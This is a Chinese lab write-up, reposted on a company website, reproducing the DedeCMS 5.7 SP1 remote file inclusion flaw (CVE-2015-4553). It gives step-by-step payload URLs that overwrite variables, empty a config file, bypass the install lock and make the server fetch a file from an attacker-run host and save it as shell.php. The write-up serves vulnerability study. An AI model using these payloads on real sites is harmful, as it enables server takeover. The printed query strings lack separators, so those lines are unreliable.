• 企业400电话
  • 网络优化推广
  • AI电话机器人
  • 呼叫中心
  • 全 部 栏 目

    网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553)
    POST TIME:2021-10-18 09:21

    一、漏洞描述

    该漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖,以至于最后引起远程文件包含漏洞。

    二、漏洞影响版本

    DeDeCMS 5.7-sp1,包括5.7 sp1版本

    三、漏洞环境搭建

    1、下载DeDeCMS V5.7 SP1,然后放到phpstudy环境下的www目录下,然后浏览器访http://192.168.10.171/dedecms/uploads/install/index.php

      

    2、点击我已阅读并继续。然后是环境检测,保存默认即可

      

    3、接下来是参数配置,需要设置的只有数据库密码,把自己的密码填上去就行了

      

    4、然后就把环境搭好了

      

    四、漏洞复现

    1、查看/install/index.php源码,发现存在变量覆盖漏洞,该代码的意思是将get,post或者cookie方式传入的值通过foreach以键值对的方式输出,例如在url中输入?str=hello,则$_k的值就是str,$_v的值就是hello,所以${$_k}就是$str, 后面的RunMagicQuotes函数在另一个文件中定义的,大致就是对参数进行过滤然后返回参数内容。

      

      

    2、尝试通过变量覆盖重装网站,浏览器访问

      

    3、变量覆盖后,直接进入安装界面,但是由于安装锁的存在不能继续重新安装,除非删除安装锁http://192.168.10.171/dedecms/uploads/install/index.php?insLockfile=1

      

    4、只有变量覆盖暂时还不够,继续浏览代码,发现最后几行代码

      

    4.1、这段代码首先包含了/data/admin/config_update.php文件, 这里定义了变量updateHost

    文件内容如下:

      

    4.2、继续看373-387行代码,$updateHost与dedecms/demodata.{$a_lang}.txt拼接为字符串,并利用files_get_contents函数读取demodata.{$s_lang}.txt文件内容,最后将该文件内容写入到$install_demo_name参数中。

    4.3、因此我们可以结合上面的变量覆盖漏洞来进行远程文件包含,直接写webshell。

    5、由于$updateHost变量是引入进来的,所以不能直接进行覆盖,需要先将config_update.php文件清空再包含。

    5.1、这时候可以利用fopen函数来实现,可以看到fopen中的参数是w,会直接重写文件,而file_get_contents读取文件失败会返回NULL

      

    5.2、然后利用fwrite函数,这里可以利用变量覆盖,将$s_lang随意取名成不存在的文件名, $install_demo_name指向”../data/admin/config_update.php”,为了程序能够执行到这里,需要将$step设置为11,这样就达到了清空config_update.php的目的。

    构造payload: http://192.168.10.171/dedecms/uploads/install/index.php?

    step=11s_lang=testinstall_demo_name=…/data/admin/config_update.php

    浏览器访问,提示如下

      

    5.3、查看代码,发现这里有一个判断文件是否存在(也就是判断网站是否安装)的条件,通过变量覆盖漏洞将$insLockfile构造成任意不存在的文件就可以绕过这个条件的限制

      

    5.4、再次构造payload:

    http://192.168.10.171/dedecms/uploads/install/index.php?step=11s_lang=testinsLockfile=testinstall_demo_name=../data/admin/config_update.php

      

    5.5、此时可以看到config_update.php会发现已经变为0kb,空文件

      

    5.6、config_update.php文件内容被清空之后,这时我们就可以控制updateHost参数了,这时我们就可以开始远程文件包含上传我们想要上传的文件了

    5.7、在kali上创建一个dedecms文件夹,然后创建一个demodata.gb2312.txt,写入?php phpinfo();?> ,然后开启web服务

      

    5.8、再次构造payload, install_demo_name改为要上传的路径,updateHost改为远程目标机的IP

    Payload如下:

    http://192.168.10.171/dedecms/uploads/install/index.php?step=11insLockfile=testinstall_demo_name=../shell.phpupdateHost=http://192.168.10.140/

    浏览器访问,出现界面说明写入成功

      

    5.9、查看是否上传成功,确定上传成功

      

    6、浏览器访问上传的shell.php

      

    总结

    以上所述是小编给大家介绍的DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553),希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对脚本之家网站的支持!
    如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!

    您可能感兴趣的文章:
    • Dedecms getip()的漏洞利用代码
    • dedecms v5.1 WriteBookText() code injection vul注入漏洞
    上一篇:人工智能开发语言排行榜: 不死Java, 不朽C/C++, 新贵Python【推荐】
    下一篇:大数据HelloWorld-Flink实现WordCount
  • 相关文章
  • 

    关于我们 | 付款方式 | 荣誉资质 | 业务提交 | 代理合作


    © 2016-2020 巨人网络通讯

    时间:9:00-21:00 (节假日不休)

    地址:江苏信息产业基地11号楼四层

    《增值电信业务经营许可证》 苏B2-20120278

    X

    截屏,微信识别二维码

    微信号:veteran88

    (点击微信号复制,添加好友)

     打开微信